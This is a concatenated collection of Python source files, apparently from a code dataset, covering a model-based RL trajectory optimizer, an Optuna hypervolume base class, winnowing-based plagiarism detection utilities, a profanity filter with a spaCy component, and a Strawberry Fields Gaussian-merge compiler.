weights = torch.reshape(
torch.exp(self.gamma * (values - values.max())),
(self.population_size, 1, 1),
)
norm = torch.sum(weights) + 1e-10
weighted_actions = population * weights
self.mean = torch.sum(weighted_actions, dim=0) / norm
return self.mean.clone()
class TrajectoryOptimizer:
"""Class for using generic optimizers on trajectory optimization problems.
This is a convenience class that sets up optimization problem for trajectories, given only
action bounds and the length of the horizon. Using this class, the concern of handling
appropriate tensor shapes for the optimization problem is hidden from the users, which only
need to provide a function that is capable of evaluating trajectories of actions. It also
takes care of shifting previous solution for the next optimization call, if the user desires.
The optimization variables for the problem will have shape ``H x A``, where ``H`` and ``A``
represent planning horizon and action dimension, respectively. The initial solution for the
optimizer will be computed as (action_ub - action_lb) / 2, for each time step.
Args:
optimizer_cfg (omegaconf.DictConfig): the configuration of the optimizer to use.
action_lb (np.ndarray): the lower bound for actions.
action_ub (np.ndarray): the upper bound for actions.
planning_horizon (int): the length of the trajectories that will be optimized.
replan_freq (int): the frequency of re-planning. This is used for shifting the previous
solution for the next time step, when ``keep_last_solution == True``. Defaults to 1.
keep_last_solution (bool): if ``True``, the last solution found by a call to
:meth:`optimize` is kept as the initial solution for the next step. This solution is
            shifted ``replan_freq`` time steps, and the new entries are filled using the initial
solution. Defaults to ``True``.
"""
def __init__(
self,
optimizer_cfg: omegaconf.DictConfig,
action_lb: np.ndarray,
action_ub: np.ndarray,
planning_horizon: int,
replan_freq: int = 1,
keep_last_solution: bool = True,
):
optimizer_cfg.lower_bound = np.tile(action_lb, (planning_horizon, 1)).tolist()
optimizer_cfg.upper_bound = np.tile(action_ub, (planning_horizon, 1)).tolist()
self.optimizer: Optimizer = hydra.utils.instantiate(optimizer_cfg)
self.initial_solution = (
((torch.tensor(action_lb) + torch.tensor(action_ub)) / 2)
.float()
.to(optimizer_cfg.device)
)
self.initial_solution = self.initial_solution.repeat((planning_horizon, 1))
self.previous_solution = self.initial_solution.clone()
self.replan_freq = replan_freq
self.keep_last_solution = keep_last_solution
self.horizon = planning_horizon
def optimize(
self,
trajectory_eval_fn: Callable[[torch.Tensor], torch.Tensor],
callback: Optional[Callable] = None,
) -> np.ndarray:
"""Runs the trajectory optimization.
Args:
trajectory_eval_fn (callable(tensor) -> tensor): A function that receives a batch
of action sequences and returns a batch of objective function values (e.g.,
accumulated reward for each sequence). The shape of the action sequence tensor
will be ``B x H x A``, where ``B``, ``H``, and ``A`` represent batch size,
planning horizon, and action dimension, respectively.
callback (callable, optional): a callback function
to pass to the optimizer.
Returns:
            (np.ndarray): the best action sequence found.
"""
best_solution = self.optimizer.optimize(
trajectory_eval_fn,
x0=self.previous_solution,
callback=callback,
)
if self.keep_last_solution:
self.previous_solution = best_solution.roll(-self.replan_freq, dims=0)
# Note that initial_solution[i] is the same for all values of [i],
# so just pick i = 0
self.previous_solution[-self.replan_freq :] = self.initial_solution[0]
return best_solution.cpu().numpy()
def reset(self):
"""Resets the previous solution cache to the initial solution."""
self.previous_solution = self.initial_solution.clone()
class TrajectoryOptimizerAgent(Agent):
"""Agent that performs trajectory optimization on a given objective function for each action.
This class uses an internal :class:`TrajectoryOptimizer` object to generate
sequence of actions, given a user-defined trajectory optimization function.
Args:
optimizer_cfg (omegaconf.DictConfig): the configuration of the base optimizer to pass to
the trajectory optimizer.
action_lb (sequence of floats): the lower bound of the action space.
action_ub (sequence of floats): the upper bound of the action space.
planning_horizon (int): the length of action sequences to evaluate. Defaults to 1.
replan_freq (int): the frequency of re-planning. The agent will keep a cache of the
            generated sequences and use it for ``replan_freq`` number of :meth:`act` calls.
Defaults to 1.
verbose (bool): if ``True``, prints the planning time on the console.
Note:
After constructing an agent of this type, the user must call
:meth:`set_trajectory_eval_fn`. This is not passed to the constructor so that the agent can
be automatically instantiated with Hydra (which in turn makes it easy to replace this
agent with an agent of another type via config-only changes).
"""
def __init__(
self,
optimizer_cfg: omegaconf.DictConfig,
action_lb: Sequence[float],
action_ub: Sequence[float],
planning_horizon: int = 1,
replan_freq: int = 1,
verbose: bool = False,
):
self.optimizer = TrajectoryOptimizer(
optimizer_cfg,
np.array(action_lb),
np.array(action_ub),
planning_horizon=planning_horizon,
replan_freq=replan_freq,
)
self.optimizer_args = {
"optimizer_cfg": optimizer_cfg,
"action_lb": np.array(action_lb),
"action_ub": np.array(action_ub),
}
self.trajectory_eval_fn: mbrl.types.TrajectoryEvalFnType = None
self.actions_to_use: List[np.ndarray] = []
self.replan_freq = replan_freq
self.verbose = verbose
def set_trajectory_eval_fn(
self, trajectory_eval_fn: mbrl.types.TrajectoryEvalFnType
):
"""Sets the trajectory evaluation function.
Args:
trajectory_eval_fn (callable): a trajectory evaluation function, as described in
:class:`TrajectoryOptimizer`.
"""
self.trajectory_eval_fn = trajectory_eval_fn
def reset(self, planning_horizon: Optional[int] = None):
"""Resets the underlying trajectory optimizer."""
if planning_horizon:
self.optimizer = TrajectoryOptimizer(
cast(omegaconf.DictConfig, self.optimizer_args["optimizer_cfg"]),
cast(np.ndarray, self.optimizer_args["action_lb"]),
cast(np.ndarray, self.optimizer_args["action_ub"]),
planning_horizon=planning_horizon,
replan_freq=self.replan_freq,
)
self.optimizer.reset()
def act(self, obs: np.ndarray, **_kwargs) -> np.ndarray:
"""Issues an action given an observation.
This method optimizes a full sequence of length ``self.planning_horizon`` and returns
the first action in the sequence. If ``self.replan_freq > 1``, future calls will use
subsequent actions in the sequence, for ``self.replan_freq`` number of steps.
After that, the method will plan again, and repeat this process.
Args:
obs (np.ndarray): the observation for which the action is needed.
Returns:
(np.ndarray): the action.
"""
if self.trajectory_eval_fn is None:
raise RuntimeError(
"Please call `set_trajectory_eval_fn()` before using TrajectoryOptimizerAgent"
)
plan_time = 0.0
if not self.actions_to_use: # re-plan is necessary
def trajectory_eval_fn(action_sequences):
return self.trajectory_eval_fn(obs, action_sequences)
start_time = time.time()
plan = self.optimizer.optimize(trajectory_eval_fn)
plan_time = time.time() - start_time
self.actions_to_use.extend([a for a in plan[: self.replan_freq]])
action = self.actions_to_use.pop(0)
if self.verbose:
print(f"Planning time: {plan_time:.3f}")
return action
def plan(self, obs: np.ndarray, **_kwargs) -> np.ndarray:
"""Issues a sequence of actions given an observation.
        Returns a sequence of length ``self.planning_horizon``.
Args:
obs (np.ndarray): the observation for which the sequence is needed.
Returns:
(np.ndarray): a sequence of actions.
"""
if self.trajectory_eval_fn is None:
raise RuntimeError(
"Please call `set_trajectory_eval_fn()` before using TrajectoryOptimizerAgent"
)
def trajectory_eval_fn(action_sequences):
return self.trajectory_eval_fn(obs, action_sequences)
plan = self.optimizer.optimize(trajectory_eval_fn)
return plan
def create_trajectory_optim_agent_for_model(
model_env: mbrl.models.ModelEnv,
agent_cfg: omegaconf.DictConfig,
num_particles: int = 1,
) -> TrajectoryOptimizerAgent:
"""Utility function for creating a trajectory optimizer agent for a model environment.
This is a convenience function for creating a :class:`TrajectoryOptimizerAgent`,
using :meth:`mbrl.models.ModelEnv.evaluate_action_sequences` as its objective function.
Args:
model_env (mbrl.models.ModelEnv): the model environment.
agent_cfg (omegaconf.DictConfig): the agent's configuration.
num_particles (int): the number of particles for taking averages of action sequences'
total rewards.
Returns:
(:class:`TrajectoryOptimizerAgent`): the agent.
"""
complete_agent_cfg(model_env, agent_cfg)
agent = hydra.utils.instantiate(agent_cfg)
def trajectory_eval_fn(initial_state, action_sequences):
return model_env.evaluate_action_sequences(
action_sequences, initial_state=initial_state, num_particles=num_particles
)
agent.set_trajectory_eval_fn(trajectory_eval_fn)
return agent
```
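The note in the class docstring above says the evaluation function must be wired up after construction. A minimal usage sketch, assuming a CEM-style optimizer config and a toy evaluation function; the ``_target_`` path, the config fields, and the placeholder objective below are illustrative assumptions, not taken from this file:
```python
import numpy as np
import omegaconf

# Illustrative optimizer config; the exact `_target_` and field names depend on
# the optimizer implementation available in the library and may differ.
optimizer_cfg = omegaconf.OmegaConf.create(
    {
        "_target_": "mbrl.planning.CEMOptimizer",  # assumed import path
        "num_iterations": 5,
        "elite_ratio": 0.1,
        "population_size": 350,
        "alpha": 0.1,
        "device": "cpu",
        "lower_bound": "???",  # filled in from action_lb/action_ub by TrajectoryOptimizer
        "upper_bound": "???",
        "return_mean_elites": True,
    }
)

agent = TrajectoryOptimizerAgent(
    optimizer_cfg,
    action_lb=[-1.0],
    action_ub=[1.0],
    planning_horizon=15,
    replan_freq=1,
)

def toy_eval_fn(obs, action_sequences):
    # Placeholder objective that prefers small actions. A real evaluation
    # function would roll out a learned dynamics model and return one
    # predicted return per candidate action sequence.
    flat = action_sequences.reshape(action_sequences.shape[0], -1)
    return -(flat ** 2).sum(-1)

agent.set_trajectory_eval_fn(toy_eval_fn)
first_action = agent.act(np.zeros(3))
```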
|
{
"source": "Jeyhooon/optuna",
"score": 4
}
|
#### File: multi_objective/_hypervolume/base.py
```python
import abc
import numpy as np
class BaseHypervolume(object, metaclass=abc.ABCMeta):
"""Base class for hypervolume calculators.
.. note::
This class is used for computing the hypervolumes of points in multi-objective space.
Each coordinate of each point represents one value of the multi-objective function.
.. note::
We check that each objective is to be minimized. Transform objective values that are
to be maximized before calling this class's ``compute`` method.
Example:
.. testcode::
import numpy as np
import optuna
from optuna.multi_objective._hypervolume import WFG
def objective(trial):
return trial.suggest_float("x", 0, 1), trial.suggest_float("y", 0, 1)
study = optuna.multi_objective.create_study(["maximize", "minimize"])
study.optimize(objective, n_trials=10)
trials = study.get_pareto_front_trials()
solution_sets = np.array([list(t.values) for t in trials])
# Normalize the solution set by negating.
solution_sets = np.array([[-s[0], s[1]] for s in solution_sets])
# A reference point is dominated by all points.
reference_point = np.max(solution_sets, axis=0) + 1
hypervolume = WFG().compute(solution_sets, reference_point)
print("Hypervolume of the Pareto solutions is {}.".format(hypervolume))
"""
def compute(self, solution_set: np.ndarray, reference_point: np.ndarray) -> float:
"""Compute the hypervolume for the given solution set and reference point.
.. note::
We assume that all points in the solution set dominate or equal the reference point.
In other words, for all points in the solution set and the coordinate ``i``,
``point[i] <= reference_point[i]``.
Args:
solution_set:
The solution set which we want to compute the hypervolume.
reference_point:
The reference point to compute the hypervolume.
"""
self._validate(solution_set, reference_point)
return self._compute(solution_set, reference_point)
@staticmethod
def _validate(solution_set: np.ndarray, reference_point: np.ndarray) -> None:
# Validates that all points in the solution set dominate or equal the reference point.
if not (solution_set <= reference_point).all():
raise ValueError(
"All points must dominate or equal the reference point. "
"That is, for all points in the solution_set and the coordinate `i`, "
"`point[i] <= reference_point[i]`."
)
@abc.abstractmethod
def _compute(self, solution_set: np.ndarray, reference_point: np.ndarray) -> float:
raise NotImplementedError
```
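For concreteness, here is a minimal subclass sketch showing what an exact ``_compute`` can look like in the two-objective (minimization) case. This simple sweep is only an illustration and is not the WFG algorithm shipped with the package:
```python
import numpy as np


class TwoObjectiveHypervolume(BaseHypervolume):
    """Exact hypervolume for exactly two minimization objectives (illustrative)."""

    def _compute(self, solution_set: np.ndarray, reference_point: np.ndarray) -> float:
        # Sweep the points by increasing first objective and accumulate the
        # rectangle each one adds below the reference point. Dominated points
        # contribute nothing because they never lower `best_second`.
        ordered = solution_set[np.argsort(solution_set[:, 0])]
        hypervolume = 0.0
        best_second = reference_point[1]
        for first, second in ordered:
            if second < best_second:
                hypervolume += (reference_point[0] - first) * (best_second - second)
                best_second = second
        return float(hypervolume)


# Usage mirrors the base class: `compute` validates, then delegates to `_compute`.
points = np.array([[0.0, 0.5], [0.5, 0.0]])
reference = np.array([1.0, 1.0])
print(TwoObjectiveHypervolume().compute(points, reference))  # 0.75
```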
|
{
"source": "Jeyhun023/plagiarism-detect",
"score": 3
}
|
#### File: plagiarism-detect/plagiarismdetect/utils.py
```python
from pygments import lexers, token
import pygments.util
import numpy as np
import logging
from markupsafe import escape
# if the C extension is available, use it. For almost all use cases
# the speed difference is not significant, so if the C extension isn't
# found copydetect will silently switch to the python implementation.
try:
from .winnow import _winnow
except (ModuleNotFoundError, ImportError):
from .pywinnow import _winnow
def filter_code(code, filename, language=None):
"""Tokenize and filter a code document. Replace variable names with
V, function names with F, object names with O, and strings with S.
Return the filtered document and a list of offsets indicating how
many characters were removed by filtering at each index in the
resulting document where filtering occurred (this is used later to
highlight the original code using plagiarism detection results on
the filtered code)
"""
try:
if language is not None:
lexer = lexers.get_lexer_by_name(language)
else:
lexer = lexers.get_lexer_for_filename(filename)
tokens = lexer.get_tokens(code)
except pygments.util.ClassNotFound:
logging.warning(f"{filename} not tokenized: unknown file extension")
return code, np.array([])
if lexer == pygments.lexers.TextLexer:
logging.warning(f"did not tokenize plaintext file {filename}")
return code, np.array([])
out_code = ""
offset = 0
offsets = [[0,0]]
variable_tokens = {token.Name, token.Name.Variable, token.Name.Attribute}
for t in tokens:
if t[0] in variable_tokens:
out_code += "V"
offsets.append([len(out_code) - 1, offset])
offset += len(t[1]) - 1
elif t[0] in token.Name.Function:
out_code += "F"
offsets.append([len(out_code) - 1, offset])
offset += len(t[1]) - 1
elif t[0] in token.Name.Class:
out_code += "O"
offsets.append([len(out_code) - 1, offset])
offset += len(t[1]) - 1
elif t[0] == token.Comment.Preproc or t[0] == token.Comment.Hashbang:
out_code += "P"
offsets.append([len(out_code) - 1, offset])
offset += len(t[1]) - 1
elif t[0] in token.Text or t[0] in token.Comment:
offsets.append([len(out_code) - 1, offset])
offset += len(t[1])
elif t[0] in token.Literal.String:
if t[1] == "'" or t[1] == '"':
out_code += '"'
else:
out_code += "S"
offsets.append([len(out_code) - 1, offset])
offset += len(t[1]) - 1
else:
out_code += t[1]
return out_code, np.array(offsets)
def hashed_kgrams(string, k):
"""Return hashes of all k-grams in a string"""
hashes = [hash(string[offset:offset+k])
for offset in range(len(string) - k + 1)]
return np.array(hashes)
def winnow(hashes, window_size, remove_duplicates=True):
"""implementation of the robust winnowing algorithm decribed in
https://theory.stanford.edu/~aiken/publications/papers/sigmod03.pdf
Returns a list of selected hashes and the indexes of those hashes.
"""
if window_size < 1:
raise ValueError("window_size must be greater than 0")
# window size of 1 will just select all hashes
if window_size == 1:
selected_hashes = hashes
selected_idx = np.arange(len(hashes))
else:
selected_idx = _winnow(hashes, window_size)
selected_hashes = hashes[selected_idx]
if remove_duplicates:
selected_hashes, unique_idx = np.unique(selected_hashes,
return_index=True)
selected_idx = selected_idx[unique_idx]
return selected_hashes, selected_idx
def get_copied_slices(idx, k):
"""Given k and a list of indexes detected by
find_fingerprint_overlap, generates a list of slices where the
copied code begins and ends. Returns a 2D array where the first
dimension is slice start locations and the second dimension is
slice end locations.
"""
if len(idx) == 0:
return np.array([[],[]])
# determine the gaps between slices (called skips)
sorted_idx = np.sort(idx)
next_idx = np.concatenate([sorted_idx[1:], [0]])
skips = np.where(next_idx - sorted_idx > k - 1)[0]
# use the elements around the gaps to compute slice start/ends
slice_starts = np.concatenate([[sorted_idx[0]], sorted_idx[skips + 1]])
slice_ends = np.concatenate([sorted_idx[skips]+k, [sorted_idx[-1]+k]])
return np.array([slice_starts, slice_ends])
def get_document_fingerprints(doc, k, window_size, boilerplate=[]):
"""Given a document, computes all k-gram hashes and uses the
winnowing algorithm to reduce their number. Optionally takes a
list of boilerplate hashes to remove from the winnowed list.
Returns the selected hashes and their indexes in the original list
"""
hashes, idx = winnow(hashed_kgrams(doc, k=k), window_size=window_size)
if len(boilerplate) > 0:
_, overlap_idx, _ = np.intersect1d(hashes, boilerplate,
return_indices=True,
assume_unique=True)
idx = np.delete(idx, overlap_idx)
hashes = np.delete(hashes, overlap_idx)
return hashes, idx
def find_fingerprint_overlap(hashes1, hashes2, idx1, idx2):
"""Finds the indexes of overlapping values between two lists of
hashes. Returns two lists of indexes, one for the first hash list
and one for the second. The indexes of the original hashes are
provided in case boilerplate results in gaps.
"""
overlap, ol_idx1, ol_idx2 = np.intersect1d(hashes1, hashes2,
return_indices=True, assume_unique=True)
return idx1[ol_idx1], idx2[ol_idx2]
def highlight_overlap(doc, slices, left_hl, right_hl,
truncate=-1, escape_html=False):
"""Highlights copied code in a document given the slices containing
copied code and strings to use for the highlight start and end.
Returns the document annotated with the highlight strings as well as
the percentage of code which was highlighted. If truncate is set to
an integer, everything not within that many lines of highlighted
code will be replaced with "..."
"""
hl_percent = np.sum(slices[1] - slices[0])/len(doc)
new_doc = ""
current_idx = 0
for slice_idx in range(slices.shape[1]):
start_idx = slices[0,slice_idx]
end_idx = slices[1,slice_idx]
if escape_html:
pre_highlight = str(escape(doc[current_idx:start_idx]))
highlighted = left_hl+str(escape(doc[start_idx:end_idx]))+right_hl
else:
pre_highlight = doc[current_idx:start_idx]
highlighted = left_hl + doc[start_idx:end_idx] + right_hl
if truncate >= 0:
lines = pre_highlight.split("\n")
if slice_idx != 0 and len(lines) > truncate*2:
pre_highlight = ("\n".join(lines[:truncate+1]) + "\n\n...\n\n"
+ "\n".join(lines[-truncate - 1:]))
elif len(lines) > truncate:
pre_highlight = "\n".join(lines[-truncate - 1:])
new_doc += pre_highlight + highlighted
current_idx = end_idx
if escape_html:
post_highlight = str(escape(doc[current_idx:]))
else:
post_highlight = doc[current_idx:]
if truncate >= 0:
lines = post_highlight.split("\n")
if len(lines) > truncate:
post_highlight = "\n".join(lines[:truncate])
new_doc += post_highlight
return new_doc, hl_percent
```
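Taken together, these helpers form a small fingerprint-and-compare pipeline. A short end-to-end sketch; the two snippets, the file names, and the ``k``/``window_size`` values are made up for illustration and are not defaults of this module:
```python
# Two superficially different snippets that filter to the same token stream.
doc_a = "def add(a, b):\n    return a + b\n"
doc_b = "def total(x, y):\n    return x + y\n"

filtered_a, offsets_a = filter_code(doc_a, "a.py")
filtered_b, offsets_b = filter_code(doc_b, "b.py")

k, window_size = 5, 4
hashes_a, idx_a = get_document_fingerprints(filtered_a, k, window_size)
hashes_b, idx_b = get_document_fingerprints(filtered_b, k, window_size)

# Indexes (into the filtered documents) where the fingerprints overlap.
overlap_a, overlap_b = find_fingerprint_overlap(hashes_a, hashes_b, idx_a, idx_b)

slices_a = get_copied_slices(overlap_a, k)
marked, fraction = highlight_overlap(filtered_a, slices_a, ">>", "<<")
print(f"{fraction:.0%} of the filtered document is shared")
print(marked)
```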
|
{
"source": "Jeyhun023/python",
"score": 3
}
|
#### File: python/badwords/console.py
```python
from sys import exit
import argparse
from profanity_filter.profanity_filter import ProfanityFilter
def main():
parser = argparse.ArgumentParser(description='Profanity filter console utility')
group = parser.add_mutually_exclusive_group()
group.add_argument('-t', '--text', dest='text', help='Test the given text for profanity')
group.add_argument('-f', '--file', dest='path', help='Test the given file for profanity')
parser.add_argument('-l', '--languages', dest='languages', default='en',
help='Test for profanity using specified languages (comma separated)')
parser.add_argument('-o', '--output', dest='output_file', help='Write the censored output to a file')
parser.add_argument('--show', action='store_true', help='Print the censored text')
args = parser.parse_args()
if args.text and args.path:
parser.print_help()
exit()
if args.text:
text = args.text
elif args.path:
with open(args.path) as f:
text = ''.join(f.readlines())
else:
text = ''
pf = ProfanityFilter(languages=args.languages.split(','))
censored_text = pf.censor(text)
if args.output_file:
with open(args.output_file, 'w') as f:
f.write(censored_text)
print("Censored text written to output file at: " + args.output_file)
if args.show:
print("Censored text:\n")
print(censored_text)
if args.show or args.output_file:
return
if pf.is_clean(text):
print("This text is clean.")
else:
print("This text is not clean!")
if __name__ == '__main__':
main()
```
#### File: python/badwords/spacy_component.py
```python
from contextlib import suppress
from typing import Union, Optional, Generator, List
import spacy.language
from more_itertools import partitions
from spacy.tokens import Doc, Span, Token
from profanity_filter import spacy_utlis
from profanity_filter.types_ import Language
class SpacyProfanityFilterComponent:
name = 'profanity_filter'
# noinspection PyUnresolvedReferences
def __init__(self, profanity_filter: 'ProfanityFilter', nlp: spacy.language.Language, language: Language = None,
stop_on_first_profane_word: bool = False):
self._language = language
self._nlp = nlp # Used only for tokenization
self._profanity_filter = profanity_filter
self._stop_on_first_profane_word = stop_on_first_profane_word
# noinspection PyProtectedMember
def __call__(self, doc: Doc, language: Language = None, stop_on_first_profane_word: Optional[bool] = None) -> Doc:
self.register_extensions(exist_ok=True)
if language is None:
language = self._language
if stop_on_first_profane_word is None:
stop_on_first_profane_word = self._stop_on_first_profane_word
i = 0
while i < len(doc):
j = i + 1
while (j < len(doc)
and not doc[j - 1].whitespace_ and not doc[j - 1].is_space and not doc[j - 1].is_punct
and not doc[j].is_space and not doc[j].is_punct):
j += 1
span = self._censor_spaceless_span(doc[i:j], language=language)
if stop_on_first_profane_word and span._.is_profane:
break
i += len(span)
return doc
@staticmethod
def register_extensions(exist_ok: bool = False) -> None:
def do() -> None:
Token.set_extension('censored', default=None)
Token.set_extension('is_profane', getter=SpacyProfanityFilterComponent.token_is_profane)
Token.set_extension('original_profane_word', default=None)
Span.set_extension('is_profane', getter=SpacyProfanityFilterComponent.tokens_are_profane)
Doc.set_extension('is_profane', getter=SpacyProfanityFilterComponent.tokens_are_profane)
if exist_ok:
with suppress(ValueError):
do()
else:
do()
@staticmethod
def token_is_profane(token: Token) -> bool:
# noinspection PyProtectedMember
return token._.censored != token.text
@staticmethod
def tokens_are_profane(tokens: Union[Doc, Span]) -> bool:
# noinspection PyProtectedMember
return any(token._.is_profane for token in tokens)
def _span_partitions(self, span: Span) -> Generator[List[Token], None, None]:
if len(span) == 1:
return span[0]
for partition in partitions(span):
yield [spacy_utlis.make_token(nlp=self._nlp, word=''.join(element)) for element in partition]
# noinspection PyProtectedMember
def _censor_spaceless_span(self, span: Span, language: Language) -> Span:
token = spacy_utlis.make_token(nlp=self._nlp, word=str(span) if len(span) > 1 else span[0])
censored_word = self._profanity_filter.censor_word(word=token, language=language)
if censored_word.is_profane:
with span.doc.retokenize() as retokenizer:
retokenizer.merge(span)
token = span[0]
token._.censored = censored_word.censored
token._.original_profane_word = censored_word.original_profane_word
else:
for token in span:
token._.censored = token.text
return span
```
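A minimal wiring sketch for the component above, assuming a spaCy 2.x-style pipeline where a component instance can be added directly with ``nlp.add_pipe`` (spaCy 3.x needs a registered factory instead), and reusing the ``ProfanityFilter(languages=...)`` construction shown in ``console.py``; the model name is an assumption:
```python
import spacy

from profanity_filter.profanity_filter import ProfanityFilter

nlp = spacy.load("en_core_web_sm")  # assumes the small English model is installed
pf = ProfanityFilter(languages=["en"])

component = SpacyProfanityFilterComponent(profanity_filter=pf, nlp=nlp, language="en")
nlp.add_pipe(component, last=True)  # spaCy 2.x API

doc = nlp("some text to check")
print(doc._.is_profane)  # custom extensions are registered on the first call
```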
|
{
"source": "JeyKelly/strawberryfields",
"score": 2
}
|
#### File: strawberryfields/compilers/gaussian_merge.py
```python
import strawberryfields.program_utils as pu
from .compiler import Compiler
from .gaussian_unitary import GaussianUnitary
def get_qumodes_operated_upon(op):
"""
Helper function that returns a list of integers: the indexes of the qumodes that op operates upon.
"""
return [reg.ind for reg in op.reg]
def get_op_name(op):
"""
Helper function that obtains the string name of an operation.
"""
return op.op.__class__.__name__
class GaussianMerge(Compiler):
"""Compiler that merges adjacent Gaussian operations into a single symplectic transformation,
to reduce the depth of non-Gaussian programs.
As a result, the Gaussian operations that this compiler returns are :class:`~.ops.GaussianTransform`,
and :class:`~.ops.Displacement`. Meanwhile, non-Gaussian operations remain unchanged.
**Example:**
Consider the following Strawberry Fields program, compiled using the `'gaussian_merge'` compiler:
.. code-block:: python3
from strawberryfields.ops import Rgate, Kgate, Dgate
import strawberryfields as sf
circuit = sf.Program(1)
with circuit.context as q:
Rgate(0.6)|q[0]
Rgate(0.2)|q[0]
Kgate(0.4)|q[0]
Rgate(0.1)|q[0]
Rgate(0.6)|q[0]
Dgate(0.01)|(q[0])
compiled_circuit = circuit.compile(compiler="gaussian_merge")
We can now print the compiled circuit, which has merged adjacent Gaussian
operations into singular :class:`~.GaussianTransform` operations:
>>> compiled_circuit.print()
GaussianTransform([[ 0.6967 -0.7174]
[0.7174 0.6967]]) | (q[0])
Kgate(0.4)|q[0]
GaussianTransform([[ 0.7648 -0.6442]
[0.6442 0.7648]]) | (q[0])
Dgate(0.01, 0) | (q[0])
"""
short_name = "gaussian_merge"
interactive = True
primitives = {
# meta operations
"All",
"_New_modes",
"_Delete",
# state preparations
"Ket",
# measurements
"MeasureFock",
"MeasureHomodyne",
# single mode gates
"Dgate",
"Sgate",
"Rgate",
"Vgate",
"Kgate",
# two mode gates
"MZgate",
"sMZgate",
"BSgate",
"CKgate",
"S2gate",
"Interferometer",
"GaussianTransform",
}
decompositions = {
"GraphEmbed": {},
"BipartiteGraphEmbed": {},
"Gaussian": {},
"Pgate": {},
"CXgate": {},
"CZgate": {},
"Xgate": {},
"Zgate": {},
"Fouriergate": {},
}
prep_states = ["Ket"]
gaussian_ops = [
"Dgate",
"BSgate",
"S2gate",
"Sgate",
"GaussianTransform",
"Rgate",
"Interferometer",
"MZgate",
"sMZgate",
]
def __init__(self):
self.curr_seq = None
self.DAG = None
self.new_DAG = None
def compile(self, seq, registers):
"""Attempt to merge Gaussian operations into Gaussian Transforms in a hybrid program.
Args:
seq (Sequence[Command]): quantum circuit to modify
registers (Sequence[RegRefs]): quantum registers
Returns:
List[Command]: modified circuit
"""
self.curr_seq = seq
while self.merge_a_gaussian_op(registers):
continue
return self.curr_seq
def merge_a_gaussian_op(self, registers):
"""
Main function to merge a gaussian operation with its gaussian neighbours.
If a merge is achieved, the method updates ``self.curr_seq`` and returns ``True``;
otherwise (no merge is possible), the method returns ``False``.
Program Flow:
- For each operation (op) check and obtain Gaussian operations that can be merged
(get_valid_gaussian_merge_ops).
- If the operation has successor gaussian operations that can be merged,
then merge them using gaussian_unitary.py.
- Determine displacement gates, from gaussian unitary merge, and map them to the qumodes acted upon
(add_displacement_gates).
- Attach predecessor operations of the main operation (op) to new Gaussian transform operations.
- Attach successor non Gaussian operations of op to a displacement gate, if present,
or a gaussian transform operation from the merged operations (add_non_gaussian_successor_gates).
- Attach all non-merged predecessor and successor of the merged operations to the new gaussian
transform and displacement gates (add_gaussian_pre_and_succ_gates).
- Remove nodes of operations that were merged in and convert DAG to sequence.
"""
self.DAG = pu.list_to_DAG(self.curr_seq)
for op in list(self.DAG.nodes):
successors = list(self.DAG.successors(op))
predecessors = list(self.DAG.predecessors(op))
# If operation is a Gaussian operation
if get_op_name(op) in self.gaussian_ops:
merged_gaussian_ops = self.get_valid_gaussian_merge_ops(op)
# If there are successor operations that are Gaussian and can be merged
if merged_gaussian_ops:
self.new_DAG = self.DAG.copy()
# Fix order of operations
unified_operations = self.organize_merge_ops([op] + merged_gaussian_ops)
gaussian_transform = GaussianUnitary().compile(unified_operations, registers)
self.new_DAG.add_node(gaussian_transform[0])
# Logic to add displacement gates. Returns a dictionary,
# where the value is a displacement gate added and its key is the qumode its operating upon.
displacement_mapping = self.add_displacement_gates(gaussian_transform)
# If there are predecessors: Attach predecessor edges to new gaussian transform
if predecessors:
self.new_DAG.add_edges_from(
[(pre, gaussian_transform[0]) for pre in predecessors]
)
# Add edges to all successor operations not merged
self.add_non_gaussian_successor_gates(
gaussian_transform, successors, displacement_mapping
)
# Add edges for all successor/predecessor operations of the merged operations
self.add_gaussian_pre_and_succ_gates(
gaussian_transform, merged_gaussian_ops, displacement_mapping
)
self.new_DAG.remove_nodes_from([op] + merged_gaussian_ops)
self.curr_seq = pu.DAG_to_list(self.new_DAG)
return True
return False
def recursive_d_gate_successors(self, gate):
"""
Gets all displacement gates in the channel if they follow each other. Returns a list of displacement gates.
"""
d_gates = []
successors = list(self.DAG.successors(gate))
for successor in successors:
if "Dgate" in get_op_name(successor):
d_gates.append(successor)
ret = self.recursive_d_gate_successors(successor)
if ret:
d_gates += ret
return d_gates
def add_non_gaussian_successor_gates(
self, gaussian_transform, successors, displacement_mapping
):
"""
Updates the DAG by adding edges between new gaussian transform and non-gaussian operations
from original operations.
"""
for successor_op in successors:
if get_op_name(successor_op) not in self.gaussian_ops:
# If there are no displacement gates.
# Add edges from it to successor gates if they act upon the same qumodes
if not displacement_mapping:
# Add edge from gaussian transform to successor operation
self.new_DAG.add_edge(gaussian_transform[0], successor_op)
def add_gaussian_pre_and_succ_gates(
self, gaussian_transform, merged_gaussian_ops, displacement_mapping
):
"""
Updates the DAG by adding edges between the gaussian transform/displacement operations and unmerged gaussian operations.
"""
successor_operations_added = []
for gaussian_op in merged_gaussian_ops:
# Need special logic if there are displacement gates
if displacement_mapping:
for successor_op in self.DAG.successors(gaussian_op):
placed_edge = False
successor_op_qumodes = get_qumodes_operated_upon(successor_op)
for qumode in successor_op_qumodes:
# If displacement gate operates on the same qumodes as the non-gaussian operation then don't
# add an edge. If register operated upon by successor operation has a displacement gate, add edge.
if (
qumode in displacement_mapping
and qumode not in self.non_gaussian_qumodes_dependecy(successor_op)
):
self.new_DAG.add_edge(displacement_mapping[qumode], successor_op)
placed_edge = True
if not placed_edge:
self.new_DAG.add_edge(gaussian_transform[0], successor_op)
successor_operations_added.append(successor_op)
else:
self.new_DAG.add_edges_from(
[(gaussian_transform[-1], post) for post in self.DAG.successors(gaussian_op)]
)
successor_operations_added += self.DAG.successors(gaussian_op)
for gaussian_op in merged_gaussian_ops:
# Append Predecessors to Gaussian Transform
for predecessor in self.DAG.predecessors(gaussian_op):
# Make sure adding the edge wont make a cycle
if predecessor not in successor_operations_added:
self.new_DAG.add_edge(predecessor, gaussian_transform[0])
def add_displacement_gates(self, gaussian_transform):
"""
Adds displacement gates to new DAG and returns dict with the following format:
{1: Dgate|q[1], 2:Dgate|q[2]}
"""
displacement_mapping = {}
# The Gaussian Unitary compiler can return Dgate in two ways. Either there is a Gaussian Transform plus Dgates
# or the only thing returned is a Dgate.
if len(gaussian_transform) > 1 or "Dgate" in get_op_name(gaussian_transform[0]):
for displacement_gate in gaussian_transform[1:]:
self.new_DAG.add_node(displacement_gate)
self.new_DAG.add_edge(gaussian_transform[0], displacement_gate)
displacement_mapping[displacement_gate.reg[0].ind] = displacement_gate
